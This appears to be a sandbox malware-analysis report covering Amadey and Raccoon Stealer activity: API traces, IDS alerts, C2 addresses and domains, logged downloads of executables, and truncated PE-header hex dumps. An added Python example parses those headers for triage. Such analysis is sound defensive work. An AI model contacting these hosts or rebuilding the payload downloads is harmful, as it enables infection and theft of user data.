                          Source: C:\Users\user\Desktop\6zsU4O4WHq.exe | Code function: 0_2_00419B49 | GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_00405E40 | wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_004096E0 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_00401280 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_00401090 | SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_00409B40 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_00409970 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                          Source: C:\Users\user\AppData\Local\Temp\ADC7.exe | Code function: 26_2_004087E0 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                          Networking:

                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack | 192.168.2.5:49887 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In | 192.168.2.5:49886 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) | 192.168.2.5:49894 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) | 192.168.2.5:49901 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) | 192.168.2.5:49914 -> 81.163.30.181:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) | 192.168.2.5:49917 -> 81.163.30.181:80
                          Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) | 192.168.2.5:49927 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt | 192.168.2.5:49927 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt | 192.168.2.5:49901 -> 185.163.204.24:80
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199:80
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115:187
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171:144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166:80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                          Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | Host: 81.163.30.181 | Accept: */*
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:10 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 
00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:18 GMTContent-Type: application/x-msdos-programContent-Length: 323072Connection: closeLast-Modified: Fri, 14 Jan 2022 11:22:01 GMTETag: "4ee00-5d589030842f9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3c cc e1 9b 52 9f e1 9b 52 9f e1 9b 52 9f ff c9 c7 9f fb 9b 52 9f ff c9 d1 9f 67 9b 52 9f c6 5d 29 9f e2 9b 52 9f e1 9b 53 9f 01 9b 52 9f ff c9 d6 9f db 9b 52 9f ff c9 c6 9f e0 9b 52 9f ff c9 c3 9f e0 9b 52 9f 52 69 63 68 e1 9b 52 9f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c8 56 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f4 03 00 00 a8 11 00 00 00 00 00 40 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 96 8b 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 28 00 00 00 00 10 15 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ee f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 75 74 61 6c 61 
00 05 00 00 00 00 e0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 76 65 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 65 00 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 15 00 00 84 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 46 00 00 00 a0 15 00 00 48 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:22:55 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 
40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:23:00 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 
00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
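Each of the four 200 OK responses above starts with a PE image, and in each case the first field of the ETag is the file size in hex (49800, 4ee00, dd000, 5b400) and equals the Content-Length (301056, 323072, 905216, 373760). The example below is added here and is not part of the sandbox report: it parses the header bytes of the first response (the GET /1.exe download from 81.163.30.181), transcribed from its Data Raw with runs of zero bytes collapsed into a `00*N` shorthand that exists only in this example, and checks that the section table accounts for exactly the 301056 bytes the server announced. The set of "common" section names is an assumption of the example, not something the report states; run against the second and fourth responses it would flag the .sutala/.buve/.bobe and .gizi/.bur/.wob sections visible in their dumps.

```python
# Added example: parse the PE headers at the start of a captured download and
# reconcile them with the HTTP Content-Length. Not part of the sandbox report.
import struct
from collections import namedtuple
from datetime import datetime, timezone


def _expand(spec: str) -> bytes:
    """Turn "4d 5a 00*3 e0" into bytes; the "xx*N" shorthand repeats byte xx N times."""
    out = bytearray()
    for tok in spec.split():
        byte, _, count = tok.partition("*")
        out += bytes.fromhex(byte) * (int(count) if count else 1)
    return bytes(out)


# First 0x278 bytes of the GET /1.exe response body, transcribed from the
# report's "Data Raw" field (zero runs collapsed with the shorthand above).
CAPTURED_HEAD = _expand(
    # DOS header (0x00-0x3f): "MZ", e_lfanew = 0xe0 stored at offset 0x3c
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 "
    "b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 "
    "00*28 e0 00 00 00 "
    # DOS stub (0x40-0x7f): "This program cannot be run in DOS mode."
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 "
    "69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f "
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 "
    "6d 6f 64 65 2e 0d 0d 0a 24 00*7 "
    # Rich header (0x80-0xdf), terminated by "Rich" + XOR key
    "32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 "
    "68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 "
    "68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 "
    "76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 "
    "68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 "
    "52 69 63 68 76 15 69 e1 00*8 "
    # "PE\0\0" + COFF file header (0xe0-0xf7): i386, 4 sections, optional hdr 0xe0
    "50 45 00 00 4c 01 04 00 d4 e8 62 5f 00*8 e0 00 03 01 "
    # Optional header, PE32 (0xf8-0x157)
    "0b 01 09 00 00 1e 01 00 00 f6 03 00 00*4 9f 2d 00 00 00 10 00 00 "
    "00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 "
    "05 00 00 00 00*4 05 00 00 00 00*4 "
    "00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 "
    "00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 "
    "00*4 10 00 00 00 "
    # 16 data directories (0x158-0x1d7): import, resource, debug, load config, IAT set
    "00*8 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 "
    "00*24 00 32 01 00 1c 00 00 00 00*24 "
    "20 59 01 00 40 00 00 00 00*8 00 30 01 00 ac 01 00 00 00*24 "
    # Section table, 4 entries of 40 bytes (0x1d8-0x277)
    "2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00*12 20 00 00 60 "
    "2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00*12 40 00 00 40 "
    "2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00*12 40 00 00 c0 "
    "2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00*12 40 00 00 40 "
)
CONTENT_LENGTH = 301056  # announced by the server in the response headers above

# Heuristic (an assumption of this example): names a stock linker emits. Anything
# else, e.g. the .sutala/.buve/.bobe seen in the second response, hints at a crypter.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc",
                        ".idata", ".edata", ".bss", ".tls", ".pdata", ".CRT"}

Section = namedtuple("Section", "name vsize va rsize roff chars")
PeSummary = namedtuple("PeSummary", "machine timestamp entry_point image_base subsystem sections")


def parse_pe_head(data: bytes) -> PeSummary:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:  # PE32 only; PE32+ (0x20B) lays ImageBase out differently
        raise ValueError(f"unsupported optional header magic {magic:#x}")
    (entry,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<I", data, opt + 28)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    sections = []
    for i in range(nsect):
        off = opt + opt_size + i * 40
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rsize, roff = struct.unpack_from("<IIII", data, off + 8)
        (chars,) = struct.unpack_from("<I", data, off + 36)
        sections.append(Section(name, vsize, va, rsize, roff, chars))
    return PeSummary(machine, timestamp, entry, image_base, subsystem, sections)


def build_time_utc(summary: PeSummary) -> str:
    """COFF TimeDateStamp as ISO-8601 UTC; trivially forged, but still worth recording."""
    return datetime.fromtimestamp(summary.timestamp, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def expected_file_size(summary: PeSummary) -> int:
    """End of the last section's raw data: the file size if nothing is appended."""
    return max(s.roff + s.rsize for s in summary.sections)


def check_download(data: bytes, content_length: int) -> dict:
    """Triage facts to pull from a captured download before it is ever executed."""
    s = parse_pe_head(data)
    predicted = expected_file_size(s)
    return {
        "build_time": build_time_utc(s),
        "entry_point_va": s.image_base + s.entry_point,
        "sections": [x.name for x in s.sections],
        "predicted_size": predicted,
        "overlay_bytes": content_length - predicted,  # >0 appended data, <0 truncated
        "odd_section_names": [x.name for x in s.sections if x.name not in COMMON_SECTION_NAMES],
    }


if __name__ == "__main__":
    for key, value in check_download(CAPTURED_HEAD, CONTENT_LENGTH).items():
        print(f"{key:>18}: {value}")
```

For this sample the four sections are laid out back to back (0x400, 0x12200, 0x16200, 0x38600) and the last one ends at 0x49800 = 301056, so the body has no overlay and the transfer was complete; a mismatch here is the first thing to check before trusting a hash computed from a pcap-carved file.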